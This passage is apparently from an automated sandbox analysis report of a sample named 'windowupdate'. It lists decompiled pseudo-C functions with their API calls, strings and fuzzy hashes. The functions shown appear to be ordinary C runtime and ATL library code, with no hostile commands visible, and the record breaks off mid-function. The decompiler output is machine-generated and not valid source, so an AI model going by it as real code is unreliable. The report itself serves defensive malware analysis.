                      • __invoke_watson_if_error.LIBCMTD ref: 00D9D93F
                      • __invoke_watson_if_error.LIBCMTD ref: 00D9D98D
                      Strings
                      • traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count), xrefs: 00D9D96F
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00D9D8E1
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00D9D917, 00D9D965
                      • traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length), xrefs: 00D9D921
                      • copy_and_add_argument_to_buffer, xrefs: 00D9D91C, 00D9D96A
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __invoke_watson_if_error$_strlen
                      • String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
                      • API String ID: 4131775925-1477255430
                      • Opcode ID: ef9edbf28aa2ed662b9203efca525713223a7009505c0a8356bb6b983fa10628
                      • Instruction ID: 404ef1cbd96be68279957104bad7cdd87b4c97465dd08d24d16c0a8a77698ed1
                      • Opcode Fuzzy Hash: ef9edbf28aa2ed662b9203efca525713223a7009505c0a8356bb6b983fa10628
                      • Instruction Fuzzy Hash: 5B315EB6D40209FBCB04EFA0CC92EEE7778EB54314F00455AB91166282EB70A718CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 30%
                      			E00D321A0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				char _v268;
                      				char _v272;
                      				signed int _t14;
                      				signed int _t15;
                      				void* _t23;
                      				void* _t26;
                      				void* _t34;
                      				void* _t39;
                      				void* _t41;
                      				void* _t42;
                      				void* _t43;
                      				signed int _t44;
                      				void* _t45;
                      				void* _t46;
                      
                      				_t43 = __esi;
                      				_t34 = __edx;
                      				_t26 = __ebx;
                      				_t41 =  &_v272;
                      				memset(_t41, 0xcccccccc, 0x43 << 2);
                      				_t46 = _t45 + 0xc;
                      				_t42 = _t41 + 0x43;
                      				_t14 =  *0xdf600c; // 0x71e60372
                      				_t15 = _t14 ^ _t44;
                      				_v8 = _t15;
                      				if(_a4 != 0) {
                      					__eflags =  *0xf23670 - 0x20;
                      					if( *0xf23670 < 0x20) {
                      						 *((intOrPtr*)(0xf215f0 +  *0xf23670 * 0x104)) = _a8;
                      						E00D4AF80(_t42,  &_v268, 0, 0x100);
                      						E00D31490(__eflags,  &_v268, 0x7f, L"%hs", _a4);
                      						_t34 = 0xf215f4 +  *0xf23670 * 0x104;
                      						E00D82600(_t34, 0x7f,  &_v268);
                      						_t46 = _t46 + 0x28;
                      						_t15 =  *0xf23670 + 1;
                      						__eflags = _t15;
                      						 *0xf23670 = _t15;
                      					} else {
                      						_t15 = 0;
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t15 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltrace.h", 0x151, 0, "%ls", L"false && \"Too many categories defined\"");
                      							_t46 = _t46 + 0x18;
                      							__eflags = 0 - 1;
                      							if(0 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					}
                      				}
                      				E00DC14C0(_t44, 0xd322a8);
                      				_t23 = _t15;
                      				_t39 = _t34;
                      				return E00DC1520(E00D47280(_t23, _t26, _v8 ^ _t44, _t39, _t42, _t43), _t44 - _t46 + 0x10c);
                      			}



















                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32282
                      Strings
                      • false && "Too many categories defined", xrefs: 00D321DE
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltrace.h, xrefs: 00D321EF
                      • %hs, xrefs: 00D32233
                      • %ls, xrefs: 00D321E3
                      • atlTraceGeneral, xrefs: 00D3225C
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %hs$%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltrace.h$atlTraceGeneral$false && "Too many categories defined"
                      • API String ID: 930174750-274957755
                      • Opcode ID: 5924d095d22248c6c34c59cd41ecd5685b0598c7276949b9bbd356f1c5eb3229
                      • Instruction ID: 59fe3c334b9b8631cca401622c59a70cbab7ee82c96eb84e126519f245786936
                      • Opcode Fuzzy Hash: 5924d095d22248c6c34c59cd41ecd5685b0598c7276949b9bbd356f1c5eb3229
                      • Instruction Fuzzy Hash: CB2131B5E042047FDB14EB14EC43FF97368EB50704F404259F9455B2C2EBF5A6848AB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D93670(void* __ecx, WCHAR* _a4) {
                      				struct HINSTANCE__* _v8;
                      
                      				_v8 = LoadLibraryExW(_a4, 0, 0x800);
                      				if(_v8 == 0) {
                      					if(GetLastError() != 0x57 || E00D92BC0(_a4, L"api-ms-", 7) == 0 || E00D92BC0(_a4, L"ext-ms-", 7) == 0) {
                      						return 0;
                      					} else {
                      						return LoadLibraryExW(_a4, 0, 0);
                      					}
                      				}
                      				return _v8;
                      			}





                      APIs
                      • LoadLibraryExW.KERNEL32(00D93569,00000000,00000800,?,?,00D93569,00000000), ref: 00D93681
                      • GetLastError.KERNEL32(?,?,00D93569), ref: 00D93695
                      • _wcsncmp.LIBCMTD ref: 00D936AB
                      • _wcsncmp.LIBCMTD ref: 00D936C2
                      • LoadLibraryExW.KERNEL32(00D93569,00000000,00000000,?,?,?,?,00D93569), ref: 00D936D6
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: LibraryLoad_wcsncmp$ErrorLast
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 180994465-537541572
                      • Opcode ID: 97d5f6365fec4f7d5572bbf508e317190337378f64b689c5fa46882306a058c3
                      • Instruction ID: 9aad06c62008e5bb136918a9ce9cc1d311c1d854faf3918be0b85e683625a68d
                      • Opcode Fuzzy Hash: 97d5f6365fec4f7d5572bbf508e317190337378f64b689c5fa46882306a058c3
                      • Instruction Fuzzy Hash: 9A018C71A40309FBDF209FA6DD0AF6A3BA89B04785F144510F908DA381EAB1EA00D7B0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 62%
                      			E00D469E3(void* __edi) {
                      				intOrPtr _t2;
                      				void* _t6;
                      				void* _t12;
                      				void* _t15;
                      				void _t16;
                      				void* _t17;
                      				intOrPtr _t19;
                      				void* _t20;
                      
                      				_t15 = __edi;
                      				_t2 =  *0xf20208; // 0x0
                      				if(_t2 != 0) {
                      					L3:
                      					if(_t2 != 1) {
                      						__imp__InterlockedPopEntrySList(_t2);
                      						_t19 = _t2;
                      						if(_t19 == 0) {
                      							_t20 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
                      							if(_t20 != 0) {
                      								__imp__InterlockedPopEntrySList( *0xf20208, _t15);
                      								_t16 =  *_t20;
                      								if(_t16 == 0) {
                      									_t1 = _t20 + 0xff0; // 0xff0
                      									_t17 = _t1;
                      									do {
                      										__imp__InterlockedPushEntrySList( *0xf20208, _t20);
                      										_t20 = _t20 + 0x10;
                      									} while (_t20 < _t17);
                      									_t6 = _t20;
                      									L15:
                      									return _t6;
                      								}
                      								VirtualFree(_t20, 0, 0x8000);
                      								_t6 = _t16;
                      								goto L15;
                      							}
                      							L9:
                      							RaiseException(0xc0000017, 0, 0, 0);
                      							return 0;
                      						}
                      						E00D4AF80(_t15, _t19, 0, 0xd);
                      						return _t19;
                      					}
                      					_t12 = HeapAlloc(GetProcessHeap(), 8, 0xd);
                      					if(_t12 == 0) {
                      						goto L9;
                      					}
                      					return _t12;
                      				}
                      				if(E00D46AF9() == 0) {
                      					goto L9;
                      				}
                      				_t2 =  *0xf20208; // 0x0
                      				goto L3;
                      			}












                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A07
                      • HeapAlloc.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A0E
                        • Part of subcall function 00D46AF9: IsProcessorFeaturePresent.KERNEL32(0000000C,00D469F5,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46AFB
                      • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A1E
                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00D46BAD,?,?,00D34CBB), ref: 00D46A45
                      • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A59
                      • InterlockedPopEntrySList.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A6C
                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A7F
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                      • String ID:
                      • API String ID: 2460949444-0
                      • Opcode ID: 9c58d7cb27338b5eecfdc5aa6872cf17bbff7f1a8e024aea47eaebec0f178810
                      • Instruction ID: 2c3f11a006cfb62a8f3aaf221224d0bd124808304220d8401066102a4a59441a
                      • Opcode Fuzzy Hash: 9c58d7cb27338b5eecfdc5aa6872cf17bbff7f1a8e024aea47eaebec0f178810
                      • Instruction Fuzzy Hash: 04110472740B13BBE6315B68AC4AF273259EF05785F184021FA82F6251DB20CC015BB6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D4FD40(intOrPtr __ecx, intOrPtr* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      
                      				_v8 = __ecx;
                      				if(E00D5A6C0(_v8) != 0) {
                      					if(E00D5A560(_v8) == 0) {
                      						if(E00D5A560(_a4) == 0) {
                      							E00D4E8C0(_v8,  *_a4);
                      						} else {
                      							_v12 = E00D5AB70(_a4);
                      							if(_v12 != 0) {
                      								E00D4FF10(_v8, _v12);
                      							}
                      						}
                      					} else {
                      						if(E00D5A560(_a4) == 0) {
                      							E00D4F820(_v8, _a4);
                      						} else {
                      							E00D4F920(_v8, E00D5AB70(_a4));
                      						}
                      					}
                      				}
                      				return _v8;
                      			}






                      APIs
                      • DName::isValid.LIBCMTD ref: 00D4FD4C
                      • DName::isEmpty.LIBCMTD ref: 00D4FD58
                      • DName::isEmpty.LIBCMTD ref: 00D4FD64
                      • DName::operator=.LIBVCRUNTIMED ref: 00D4FD79
                        • Part of subcall function 00D4F920: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F957
                      • Mailbox.LIBCMTD ref: 00D4FD87
                      • DName::isEmpty.LIBCMTD ref: 00D4FD91
                      • DName::operator+=.LIBCMTD ref: 00D4FDB4
                        • Part of subcall function 00D4FF10: DName::isValid.LIBCMTD ref: 00D4FF1A
                        • Part of subcall function 00D4FF10: DName::isEmpty.LIBCMTD ref: 00D4FF26
                        • Part of subcall function 00D4FF10: DName::operator=.LIBVCRUNTIMED ref: 00D4FF42
                      • DName::append.LIBCMTD ref: 00D4FDC4
                        • Part of subcall function 00D4E8C0: pairNode::pairNode.LIBCMTD ref: 00D4E8F6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name::is$Empty$Name::operator=Valid$MailboxNameName::appendName::operator+=NodeNode::makeNode::pairStatuspair
                      • String ID:
                      • API String ID: 1694665504-0
                      • Opcode ID: 846970c6e897798d1fe47f70cf7f594d770f8d1144d45daf0da9bd6b49569b5d
                      • Instruction ID: 7d1cc8e78f4c54ef1a9aa9e527617593a738420f365988b89b675111a429e719
                      • Opcode Fuzzy Hash: 846970c6e897798d1fe47f70cf7f594d770f8d1144d45daf0da9bd6b49569b5d
                      • Instruction Fuzzy Hash: D7110C30A00108EBCF04EFA4D9929AD7BB5EF44340F144576AC069B2A5EF30AE44DBB2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00D5D580(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				char _v1120;
                      				signed int _v1124;
                      				char _v1128;
                      				signed int _v1132;
                      				signed int _v1136;
                      				char _v1140;
                      				char _v1144;
                      				intOrPtr _v1148;
                      				signed int _v1152;
                      				signed int _v1156;
                      				char _v1160;
                      				signed int _v1164;
                      				signed int _v1168;
                      				signed int _v1172;
                      				signed int _v1176;
                      				signed int _v1180;
                      				signed int _v1184;
                      				signed int _v1188;
                      				signed int _v1192;
                      				signed int _v1196;
                      				signed int _v1200;
                      				signed int _v1204;
                      				signed int _v1208;
                      				char _v1224;
                      				char _v1228;
                      				signed int _t127;
                      				void* _t135;
                      				signed int _t147;
                      				void* _t168;
                      				void* _t171;
                      				void* _t172;
                      				void* _t173;
                      				void* _t228;
                      				void* _t229;
                      				signed int _t230;
                      				void* _t231;
                      
                      				_t229 = __esi;
                      				_t228 = __edi;
                      				_t173 = __ecx;
                      				_t172 = __ebx;
                      				_t127 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t127 ^ _t230;
                      				if(_a20 == 0) {
                      					_v1144 = 0;
                      				} else {
                      					_v1144 = 1;
                      				}
                      				_v1148 = _v1144;
                      				_t235 = _v1148;
                      				if(_v1148 == 0) {
                      					_t171 = L00D84930(_t235, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
                      					_t231 = _t231 + 0x18;
                      					if(_t171 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v1148 != 0) {
                      					__eflags = _a16;
                      					if(_a16 == 0) {
                      						L11:
                      						_v1152 = 1;
                      						L12:
                      						_v1156 = _v1152;
                      						__eflags = _v1156;
                      						if(__eflags == 0) {
                      							_t168 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
                      							_t231 = _t231 + 0x18;
                      							__eflags = _t168 - 1;
                      							if(_t168 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v1156;
                      						if(_v1156 != 0) {
                      							L00D66CC0(_t172,  &_v1224, _t229, _a24);
                      							_v1140 = 0;
                      							_v1136 = 0;
                      							_v1132 = 0;
                      							_v1128 = 0;
                      							_v1140 = _a12;
                      							_v1136 = _a16;
                      							_v1132 = 0;
                      							_v1192 = _a4 & 0x00000002;
                      							_v1188 = _a8 & 0x00000000;
                      							__eflags = _v1192 | _v1188;
                      							if((_v1192 | _v1188) != 0) {
                      								L20:
                      								_v1160 = 1;
                      								L21:
                      								_v1128 = _v1160;
                      								_t135 = E00D67A60( &_v1224);
                      								E00D66BB0( &_v1120, E00D66CA0( &_v1228,  &_v1140), _a4, _a8, _a20, _t135, _a28);
                      								_v1124 = E00D6B870(_t172,  &_v1120, _t228, _t229);
                      								__eflags = _a12;
                      								if(_a12 != 0) {
                      									_v1200 = _a4 & 0x00000001;
                      									_v1196 = _a8 & 0x00000000;
                      									__eflags = _v1200 | _v1196;
                      									if((_v1200 | _v1196) == 0) {
                      										_t221 = _a4 & 0x00000002;
                      										_v1208 = _a4 & 0x00000002;
                      										_v1204 = _a8 & 0x00000000;
                      										__eflags = _v1208 | _v1204;
                      										if((_v1208 | _v1204) == 0) {
                      											__eflags = _a16;
                      											if(_a16 != 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													__eflags = 0;
                      													 *((short*)(_a12 + _v1132 * 2)) = 0;
                      													L47:
                      													_t221 = _v1124;
                      													_v1184 = _v1124;
                      													E00D670D0( &_v1120);
                      													E00D67230( &_v1224);
                      													_t147 = _v1184;
                      													goto L48;
                      												}
                      												_t221 = 0;
                      												 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
                      												_v1180 = 0xfffffffe;
                      												E00D670D0( &_v1120);
                      												E00D67230( &_v1224);
                      												_t147 = _v1180;
                      												goto L48;
                      											}
                      											_v1176 = 0xffffffff;
                      											E00D670D0( &_v1120);
                      											E00D67230( &_v1224);
                      											_t147 = _v1176;
                      											goto L48;
                      										}
                      										__eflags = _a16;
                      										if(_a16 != 0) {
                      											__eflags = _v1124;
                      											if(_v1124 >= 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													__eflags = 0;
                      													 *((short*)(_a12 + _v1132 * 2)) = 0;
                      												} else {
                      													 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
                      												}
                      											} else {
                      												 *_a12 = 0;
                      											}
                      										}
                      										goto L47;
                      									}
                      									__eflags = _a16;
                      									if(_a16 != 0) {
                      										L27:
                      										__eflags = _v1132 - _a16;
                      										if(_v1132 == _a16) {
                      											__eflags = _v1124;
                      											if(_v1124 < 0) {
                      												L32:
                      												goto L47;
                      											}
                      											__eflags = _v1124 - _a16;
                      											if(_v1124 <= _a16) {
                      												goto L32;
                      											}
                      											_v1172 = 0xffffffff;
                      											E00D670D0( &_v1120);
                      											E00D67230( &_v1224);
                      											_t147 = _v1172;
                      											goto L48;
                      										}
                      										 *((short*)(_a12 + _v1132 * 2)) = 0;
                      										goto L32;
                      									}
                      									__eflags = _v1124;
                      									if(_v1124 == 0) {
                      										goto L27;
                      									}
                      									_v1168 = 0xffffffff;
                      									E00D670D0( &_v1120);
                      									E00D67230( &_v1224);
                      									_t147 = _v1168;
                      									goto L48;
                      								}
                      								_t221 = _v1124;
                      								_v1164 = _v1124;
                      								E00D670D0( &_v1120);
                      								E00D67230( &_v1224);
                      								_t147 = _v1164;
                      								goto L48;
                      							}
                      							__eflags = _a12;
                      							if(_a12 == 0) {
                      								goto L20;
                      							}
                      							_v1160 = 0;
                      							goto L21;
                      						} else {
                      							 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
                      							_t147 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
                      							L48:
                      							return E00D47280(_t147, _t172, _v8 ^ _t230, _t221, _t228, _t229);
                      						}
                      					}
                      					__eflags = _a12;
                      					if(_a12 != 0) {
                      						goto L11;
                      					}
                      					_v1152 = 0;
                      					goto L12;
                      				}
                      				 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
                      				_t147 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
                      				goto L48;
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5D779
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 2122a17c7f0503420548aaaacc086f9b552963d9b302313535b1badf62d85a67
                      • Instruction ID: 55059e466fbe01c3da5f68fff3735d885264ac20474a1471b43babcaa312cf3b
                      • Opcode Fuzzy Hash: 2122a17c7f0503420548aaaacc086f9b552963d9b302313535b1badf62d85a67
                      • Instruction Fuzzy Hash: 7DC125B09042198BDF34DF14CC92BAAB7B1AF45319F1041D8EA4967291DB709E89CF7A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00D5E680(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				char _v1120;
                      				signed int _v1124;
                      				char _v1128;
                      				signed int _v1132;
                      				signed int _v1136;
                      				char _v1140;
                      				char _v1144;
                      				intOrPtr _v1148;
                      				signed int _v1152;
                      				signed int _v1156;
                      				char _v1160;
                      				signed int _v1164;
                      				signed int _v1168;
                      				signed int _v1172;
                      				signed int _v1176;
                      				signed int _v1180;
                      				signed int _v1184;
                      				signed int _v1188;
                      				signed int _v1192;
                      				signed int _v1196;
                      				signed int _v1200;
                      				signed int _v1204;
                      				signed int _v1208;
                      				char _v1224;
                      				char _v1228;
                      				signed int _t127;
                      				void* _t135;
                      				signed int _t147;
                      				void* _t168;
                      				void* _t171;
                      				void* _t172;
                      				void* _t173;
                      				void* _t228;
                      				void* _t229;
                      				signed int _t230;
                      				void* _t231;
                      
                      				_t229 = __esi;
                      				_t228 = __edi;
                      				_t173 = __ecx;
                      				_t172 = __ebx;
                      				_t127 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t127 ^ _t230;
                      				if(_a20 == 0) {
                      					_v1144 = 0;
                      				} else {
                      					_v1144 = 1;
                      				}
                      				_v1148 = _v1144;
                      				_t235 = _v1148;
                      				if(_v1148 == 0) {
                      					_t171 = L00D84930(_t235, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
                      					_t231 = _t231 + 0x18;
                      					if(_t171 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v1148 != 0) {
                      					__eflags = _a16;
                      					if(_a16 == 0) {
                      						L11:
                      						_v1152 = 1;
                      						L12:
                      						_v1156 = _v1152;
                      						__eflags = _v1156;
                      						if(__eflags == 0) {
                      							_t168 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
                      							_t231 = _t231 + 0x18;
                      							__eflags = _t168 - 1;
                      							if(_t168 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v1156;
                      						if(_v1156 != 0) {
                      							L00D66CC0(_t172,  &_v1224, _t229, _a24);
                      							_v1140 = 0;
                      							_v1136 = 0;
                      							_v1132 = 0;
                      							_v1128 = 0;
                      							_v1140 = _a12;
                      							_v1136 = _a16;
                      							_v1132 = 0;
                      							_v1192 = _a4 & 0x00000002;
                      							_v1188 = _a8 & 0x00000000;
                      							__eflags = _v1192 | _v1188;
                      							if((_v1192 | _v1188) != 0) {
                      								L20:
                      								_v1160 = 1;
                      								L21:
                      								_v1128 = _v1160;
                      								_t135 = E00D67A60( &_v1224);
                      								E00D66C10( &_v1120, E00D66CA0( &_v1228,  &_v1140), _a4, _a8, _a20, _t135, _a28);
                      								_v1124 = E00D6BDD0(_t172,  &_v1120, _t228, _t229);
                      								__eflags = _a12;
                      								if(_a12 != 0) {
                      									_v1200 = _a4 & 0x00000001;
                      									_v1196 = _a8 & 0x00000000;
                      									__eflags = _v1200 | _v1196;
                      									if((_v1200 | _v1196) == 0) {
                      										_t221 = _a4 & 0x00000002;
                      										_v1208 = _a4 & 0x00000002;
                      										_v1204 = _a8 & 0x00000000;
                      										__eflags = _v1208 | _v1204;
                      										if((_v1208 | _v1204) == 0) {
                      											__eflags = _a16;
                      											if(_a16 != 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													__eflags = 0;
                      													 *((short*)(_a12 + _v1132 * 2)) = 0;
                      													L47:
                      													_t221 = _v1124;
